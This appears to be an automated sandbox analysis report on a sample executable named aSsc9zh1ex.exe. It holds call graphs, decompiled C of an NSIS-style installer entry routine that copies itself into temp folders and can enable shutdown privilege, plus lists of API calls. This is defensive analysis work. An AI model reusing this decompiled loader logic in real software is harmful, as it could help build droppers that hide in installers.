4899->4884 4904 404476 18 API calls 4900->4904 4901->4900 4903 406557 17 API calls 4902->4903 4905 405958 AppendMenuW 4903->4905 4906 4057e4 4904->4906 4907 405975 GetWindowRect 4905->4907 4908 405988 TrackPopupMenu 4905->4908 4909 405821 GetDlgItem SendMessageW 4906->4909 4910 4057ed ShowWindow 4906->4910 4907->4908 4908->4891 4912 4059a3 4908->4912 4909->4891 4911 405848 SendMessageW SendMessageW 4909->4911 4913 405810 4910->4913 4914 405803 ShowWindow 4910->4914 4911->4891 4915 4059bf SendMessageW 4912->4915 4921 4044ab SendMessageW 4913->4921 4914->4913 4915->4915 4916 4059dc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4915->4916 4918 405a01 SendMessageW 4916->4918 4918->4918 4919 405a2a GlobalUnlock SetClipboardData CloseClipboard 4918->4919 4919->4891 4920->4881 4921->4909 4922->4880 5832 404cbd 5833 404ce9 5832->5833 5834 404ccd 5832->5834 5836 404d1c 5833->5836 5837 404cef SHGetPathFromIDListW 5833->5837 5843 405b5e GetDlgItemTextW 5834->5843 5838 404d06 SendMessageW 5837->5838 5839 404cff 5837->5839 5838->5836 5841 40140b 2 API calls 5839->5841 5840 404cda SendMessageW 5840->5833 5841->5838 5843->5840 5844 40263e 5845 402652 5844->5845 5846 40266d 5844->5846 5847 402d84 17 API calls 5845->5847 5848 402672 5846->5848 5849 40269d 5846->5849 5858 402659 5847->5858 5850 402da6 17 API calls 5848->5850 5851 402da6 17 API calls 5849->5851 5852 402679 5850->5852 5853 4026a4 lstrlenW 5851->5853 5861 40653c WideCharToMultiByte 5852->5861 5853->5858 5855 40268d lstrlenA 5855->5858 5856 4026e7 5857 4026d1 5857->5856 5859 4060bc WriteFile 5857->5859 5858->5856 5858->5857 5860 4060eb 5 API calls 5858->5860 5859->5856 5860->5857 5861->5855 4979 6f002a7f 4980 6f002acf 4979->4980 4981 6f002a8f VirtualProtect 4979->4981 4981->4980

                                                                                                                              Executed Functions

                                                                                                                              Function 0040350A Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450stringfilecomCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 40350a-40355a SetErrorMode GetVersionExW 1 403594-40359b 0->1 2 40355c-403590 GetVersionExW 0->2 3 4035a5-4035e5 1->3 4 40359d 1->4 2->1 5 4035e7-4035ef call 4068e7 3->5 6 4035f8 3->6 4->3 5->6 11 4035f1 5->11 8 4035fd-403611 call 406877 lstrlenA 6->8 13 403613-40362f call 4068e7 * 3 8->13 11->6 20 403640-4036a2 #17 OleInitialize SHGetFileInfoW call 40651a GetCommandLineW call 40651a 13->20 21 403631-403637 13->21 28 4036a4-4036a6 20->28 29 4036ab-4036be call 405e16 CharNextW 20->29 21->20 25 403639 21->25 25->20 28->29 32 4037b5-4037bb 29->32 33 4037c1 32->33 34 4036c3-4036c9 32->34 35 4037d5-4037ef GetTempPathW call 4034d9 33->35 36 4036d2-4036d8 34->36 37 4036cb-4036d0 34->37 46 4037f1-40380f GetWindowsDirectoryW lstrcatW call 4034d9 35->46 47 403847-40385f DeleteFileW call 40307d 35->47 39 4036da-4036de 36->39 40 4036df-4036e3 36->40 37->36 37->37 39->40 41 4037a3-4037b1 call 405e16 40->41 42 4036e9-4036ef 40->42 41->32 57 4037b3-4037b4 41->57 44 4036f1-4036f8 42->44 45 403709-403742 42->45 49 4036fa-4036fd 44->49 50 4036ff 44->50 51 403744-403749 45->51 52 40375e-403798 45->52 46->47 66 403811-403841 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034d9 46->66 62 403865-40386b 47->62 63 403a36-403a44 call 403aef OleUninitialize 47->63 49->45 49->50 50->45 51->52 58 40374b-403753 51->58 60 4037a0-4037a2 52->60 61 40379a-40379e 52->61 57->32 64 403755-403758 58->64 65 40375a 58->65 60->41 61->60 67 4037c3-4037d0 call 40651a 61->67 68 403871-403884 call 405e16 62->68 69 403912-403919 call 403bc9 62->69 79 403a46-403a55 call 405b7a ExitProcess 63->79 80 403a5b-403a61 63->80 64->52 64->65 65->52 66->47 66->63 67->35 81 4038d6-4038e3 68->81 82 403886-4038bb 68->82 78 40391e-403921 69->78 78->63 84 403a63-403a78 GetCurrentProcess OpenProcessToken 80->84 85 403ad9-403ae1 80->85 89 4038e5-4038f3 call 405ef1 81->89 90 403926-40393a call 405ae5 lstrcatW 81->90 86 4038bd-4038c1 82->86 92 403aa9-403ab7 call 4068e7 84->92 93 403a7a-403aa3 LookupPrivilegeValueW AdjustTokenPrivileges 84->93 87 403ae3 85->87 88 403ae6-403ae9 ExitProcess 85->88 95 4038c3-4038c8 86->95 96 4038ca-4038d2 86->96 87->88 89->63 107 4038f9-40390f call 40651a * 2 89->107 105 403947-403961 lstrcatW lstrcmpiW 90->105 106 40393c-403942 lstrcatW 90->106 103 403ac5-403ad0 ExitWindowsEx 92->103 104 403ab9-403ac3 92->104 93->92 95->96 100 4038d4 95->100 96->86 96->100 100->81 103->85 108 403ad2-403ad4 call 40140b 103->108 104->103 104->108 109 403a34 105->109 110 403967-40396a 105->110 106->105 107->69 108->85 109->63 115 403973 call 405ac8 110->115 116 40396c-403971 call 405a4b 110->116 120 403978-403988 SetCurrentDirectoryW 115->120 116->120 123 403995-4039c1 call 40651a 120->123 124 40398a-403990 call 40651a 120->124 128 4039c6-4039e1 call 406557 DeleteFileW 123->128 124->123 131 403a21-403a2b 128->131 132 4039e3-4039f3 CopyFileW 128->132 131->128 133 403a2d-403a2f call 4062da 131->133 132->131 134 4039f5-403a15 call 4062da call 406557 call 405afd 132->134 133->109 134->131 142 403a17-403a1e CloseHandle 134->142 142->131
                                                                                                                              C-Code - Quality: 79%
                                                                                                                              			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b18 = _v324.dwBuildNumber;
				 *0x7a8b1c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b1e != 0x600) {
					_t180 = E004068E7(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E00406877(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E004068E7(0xb);
				 *0x7a8a64 = E004068E7(9);
				_t88 = E004068E7(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b1c =  *0x7a8b1c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x7a8b20 = _t88;
				SHGetFileInfoW(0x79ff08, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040651A(0x7a7a60, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe\" ";
				E0040651A(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x7a8a60 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M007B3002;
				}
				_t199 = CharNextW(E00405E16(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E16(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040651A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034D9(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403AEF();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x7a8af4 == _t189) {
														L77:
														_t120 =  *0x7a8b0c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E004068E7(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B7A(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8a7c == _t189) {
												L51:
												 *0x7a8b0c =  *0x7a8b0c | 0xffffffff;
												_v24 = E00403BC9(_t265);
												goto L68;
											}
											_t219 = E00405E16(L"\"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe\" ") {
													_t190 = E00405AE5(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x7b4800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AC8();
														} else {
															E00405A4B();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040651A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", 0x7b4800);
														}
														E0040651A(0x7a9000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x7a9800 = _t144;
														do {
															E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x120)));
															DeleteFileW(0x79f708);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe", 0x79f708, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062DA(_t202, 0x79f708, 0);
																	E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x124)));
																	_t153 = E00405AFD(0x79f708);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062DA(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405EF1(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040651A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E0040651A(0x7b4000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\aSsc9zh1ex.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034D9(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034D9(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x7a8b00 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                                                                                              0x00403518
                                                                                                                              0x00403519
                                                                                                                              0x00403520
                                                                                                                              0x00403523
                                                                                                                              0x0040352a
                                                                                                                              0x0040352d
                                                                                                                              0x00403540
                                                                                                                              0x00403546
                                                                                                                              0x00403549
                                                                                                                              0x0040354c
                                                                                                                              0x0040355a
                                                                                                                              0x00403562
                                                                                                                              0x0040356d
                                                                                                                              0x00403586
                                                                                                                              0x00403588
                                                                                                                              0x00403590
                                                                                                                              0x00403590
                                                                                                                              0x0040359b
                                                                                                                              0x0040359d
                                                                                                                              0x0040359d
                                                                                                                              0x004035b2
                                                                                                                              0x004035d7
                                                                                                                              0x004035e5
                                                                                                                              0x004035e8
                                                                                                                              0x004035ef
                                                                                                                              0x004035f6
                                                                                                                              0x004035f6
                                                                                                                              0x004035ef
                                                                                                                              0x004035f8
                                                                                                                              0x004035fd
                                                                                                                              0x004035fe
                                                                                                                              0x0040360a
                                                                                                                              0x0040360e
                                                                                                                              0x00403615
                                                                                                                              0x00403623
                                                                                                                              0x00403628
                                                                                                                              0x0040362f
                                                                                                                              0x00403633
                                                                                                                              0x00403637
                                                                                                                              0x00403639
                                                                                                                              0x00403639
                                                                                                                              0x00403637
                                                                                                                              0x00403640
                                                                                                                              0x00403647
                                                                                                                              0x0040364d
                                                                                                                              0x00403665
                                                                                                                              0x00403675
                                                                                                                              0x0040367a
                                                                                                                              0x00403680
                                                                                                                              0x00403687
                                                                                                                              0x0040368e
                                                                                                                              0x00403690
                                                                                                                              0x00403691
                                                                                                                              0x0040369b
                                                                                                                              0x004036a2
                                                                                                                              0x004036a4
                                                                                                                              0x004036a6
                                                                                                                              0x004036a6
                                                                                                                              0x004036b9
                                                                                                                              0x004036bb
                                                                                                                              0x004037b5
                                                                                                                              0x004037b5
                                                                                                                              0x004037b8
                                                                                                                              0x004037bb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004036c5
                                                                                                                              0x004036c6
                                                                                                                              0x004036c9
                                                                                                                              0x004036d2
                                                                                                                              0x004036d2
                                                                                                                              0x004036d5
                                                                                                                              0x004036d8
                                                                                                                              0x004036db
                                                                                                                              0x004036de
                                                                                                                              0x004036de
                                                                                                                              0x004036de
                                                                                                                              0x004036df
                                                                                                                              0x004036e3
                                                                                                                              0x004037a3
                                                                                                                              0x004037ac
                                                                                                                              0x004037ae
                                                                                                                              0x004037b1
                                                                                                                              0x004037b4
                                                                                                                              0x004037b4
                                                                                                                              0x004037b4
                                                                                                                              0x00000000
                                                                                                                              0x004036e9
                                                                                                                              0x004036ea
                                                                                                                              0x004036eb
                                                                                                                              0x004036ef
                                                                                                                              0x00403709
                                                                                                                              0x00403710
                                                                                                                              0x00403723
                                                                                                                              0x00403724
                                                                                                                              0x00403739
                                                                                                                              0x0040373e
                                                                                                                              0x00403740
                                                                                                                              0x00403742
                                                                                                                              0x0040375e
                                                                                                                              0x00403765
                                                                                                                              0x00403778
                                                                                                                              0x00403779
                                                                                                                              0x0040378e
                                                                                                                              0x00403794
                                                                                                                              0x00403796
                                                                                                                              0x00403798
                                                                                                                              0x004037a0
                                                                                                                              0x004037a2
                                                                                                                              0x00000000
                                                                                                                              0x004037a2
                                                                                                                              0x0040379c
                                                                                                                              0x0040379e
                                                                                                                              0x004037c3
                                                                                                                              0x004037c7
                                                                                                                              0x004037d0
                                                                                                                              0x004037d5
                                                                                                                              0x004037db
                                                                                                                              0x004037e6
                                                                                                                              0x004037e8
                                                                                                                              0x004037ed
                                                                                                                              0x004037ef
                                                                                                                              0x00403847
                                                                                                                              0x0040384c
                                                                                                                              0x00403855
                                                                                                                              0x0040385c
                                                                                                                              0x0040385f
                                                                                                                              0x00403a36
                                                                                                                              0x00403a36
                                                                                                                              0x00403a3b
                                                                                                                              0x00403a44
                                                                                                                              0x00403a61
                                                                                                                              0x00403ad9
                                                                                                                              0x00403ad9
                                                                                                                              0x00403ae1
                                                                                                                              0x00403ae3
                                                                                                                              0x00403ae3
                                                                                                                              0x00403ae9
                                                                                                                              0x00403ae9
                                                                                                                              0x00403a78
                                                                                                                              0x00403a84
                                                                                                                              0x00403a95
                                                                                                                              0x00403a9c
                                                                                                                              0x00403aa3
                                                                                                                              0x00403aa3
                                                                                                                              0x00403aab
                                                                                                                              0x00403ab7
                                                                                                                              0x00403ac5
                                                                                                                              0x00403ad0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403ab9
                                                                                                                              0x00403ab9
                                                                                                                              0x00403aba
                                                                                                                              0x00403abc
                                                                                                                              0x00403abd
                                                                                                                              0x00403abe
                                                                                                                              0x00403ac3
                                                                                                                              0x00403ad2
                                                                                                                              0x00403ad4
                                                                                                                              0x00000000
                                                                                                                              0x00403ad4
                                                                                                                              0x00000000
                                                                                                                              0x00403ac3
                                                                                                                              0x00403ab7
                                                                                                                              0x00403a4e
                                                                                                                              0x00403a55
                                                                                                                              0x00403a55
                                                                                                                              0x0040386b
                                                                                                                              0x00403912
                                                                                                                              0x00403912
                                                                                                                              0x0040391e
                                                                                                                              0x00000000
                                                                                                                              0x0040391e
                                                                                                                              0x0040387c
                                                                                                                              0x00403884
                                                                                                                              0x004038d6
                                                                                                                              0x004038d6
                                                                                                                              0x004038dc
                                                                                                                              0x004038e3
                                                                                                                              0x00403931
                                                                                                                              0x00403933
                                                                                                                              0x00403938
                                                                                                                              0x0040393a
                                                                                                                              0x00403942
                                                                                                                              0x00403942
                                                                                                                              0x0040394d
                                                                                                                              0x00403959
                                                                                                                              0x0040395f
                                                                                                                              0x00403961
                                                                                                                              0x00403a34
                                                                                                                              0x00403a34
                                                                                                                              0x00403a34
                                                                                                                              0x00000000
                                                                                                                              0x00403967
                                                                                                                              0x00403967
                                                                                                                              0x00403969
                                                                                                                              0x0040396a
                                                                                                                              0x00403973
                                                                                                                              0x0040396c
                                                                                                                              0x0040396c
                                                                                                                              0x0040396c
                                                                                                                              0x00403979
                                                                                                                              0x00403981
                                                                                                                              0x00403988
                                                                                                                              0x00403990
                                                                                                                              0x00403990
                                                                                                                              0x0040399d
                                                                                                                              0x004039a9
                                                                                                                              0x004039b3
                                                                                                                              0x004039b3
                                                                                                                              0x004039b5
                                                                                                                              0x004039bc
                                                                                                                              0x004039c6
                                                                                                                              0x004039d2
                                                                                                                              0x004039d8
                                                                                                                              0x004039de
                                                                                                                              0x004039e1
                                                                                                                              0x004039eb
                                                                                                                              0x004039f1
                                                                                                                              0x004039f3
                                                                                                                              0x004039f7
                                                                                                                              0x00403a08
                                                                                                                              0x00403a0e
                                                                                                                              0x00403a13
                                                                                                                              0x00403a15
                                                                                                                              0x00403a18
                                                                                                                              0x00403a1e
                                                                                                                              0x00403a1e
                                                                                                                              0x00403a15
                                                                                                                              0x004039f3
                                                                                                                              0x00403a21
                                                                                                                              0x00403a28
                                                                                                                              0x00403a28
                                                                                                                              0x00403a28
                                                                                                                              0x00403a28
                                                                                                                              0x00403a2f
                                                                                                                              0x00000000
                                                                                                                              0x00403a2f
                                                                                                                              0x00403961
                                                                                                                              0x004038e5
                                                                                                                              0x004038e8
                                                                                                                              0x004038ec
                                                                                                                              0x004038f1
                                                                                                                              0x004038f3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004038ff
                                                                                                                              0x0040390a
                                                                                                                              0x0040390f
                                                                                                                              0x00000000
                                                                                                                              0x0040390f
                                                                                                                              0x0040388d
                                                                                                                              0x004038a5
                                                                                                                              0x004038b6
                                                                                                                              0x004038b7
                                                                                                                              0x004038bb
                                                                                                                              0x004038bd
                                                                                                                              0x004038cb
                                                                                                                              0x004038d2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004038d2
                                                                                                                              0x004038d4
                                                                                                                              0x00000000
                                                                                                                              0x004038d4
                                                                                                                              0x004037f7
                                                                                                                              0x00403803
                                                                                                                              0x00403808
                                                                                                                              0x0040380d
                                                                                                                              0x0040380f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403817
                                                                                                                              0x0040381f
                                                                                                                              0x00403830
                                                                                                                              0x00403838
                                                                                                                              0x0040383a
                                                                                                                              0x0040383f
                                                                                                                              0x00403841
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403841
                                                                                                                              0x00000000
                                                                                                                              0x0040379e
                                                                                                                              0x00403747
                                                                                                                              0x00403749
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040374b
                                                                                                                              0x0040374f
                                                                                                                              0x00403753
                                                                                                                              0x0040375a
                                                                                                                              0x0040375a
                                                                                                                              0x0040375a
                                                                                                                              0x0040375a
                                                                                                                              0x00000000
                                                                                                                              0x0040375a
                                                                                                                              0x00403755
                                                                                                                              0x00403758
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403758
                                                                                                                              0x004036f1
                                                                                                                              0x004036f5
                                                                                                                              0x004036f8
                                                                                                                              0x004036ff
                                                                                                                              0x004036ff
                                                                                                                              0x00000000
                                                                                                                              0x004036ff
                                                                                                                              0x004036fa
                                                                                                                              0x004036fd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004036fd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004036cb
                                                                                                                              0x004036cb
                                                                                                                              0x004036cc
                                                                                                                              0x004036cd
                                                                                                                              0x004036cd
                                                                                                                              0x00000000
                                                                                                                              0x004036cb
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 0040352D
                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 00403556
                                                                                                                              • GetVersionExW.KERNEL32(0000011C), ref: 0040356D
                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
                                                                                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403647
                                                                                                                              • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
                                                                                                                              • GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
                                                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000020,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000000), ref: 004036B3
                                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037E6
                                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403803
                                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403817
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381F
                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
                                                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 0040384C
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403933
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403942
                                                                                                                                • Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040394D
                                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\aSsc9zh1ex.exe" ,00000000,?), ref: 00403959
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
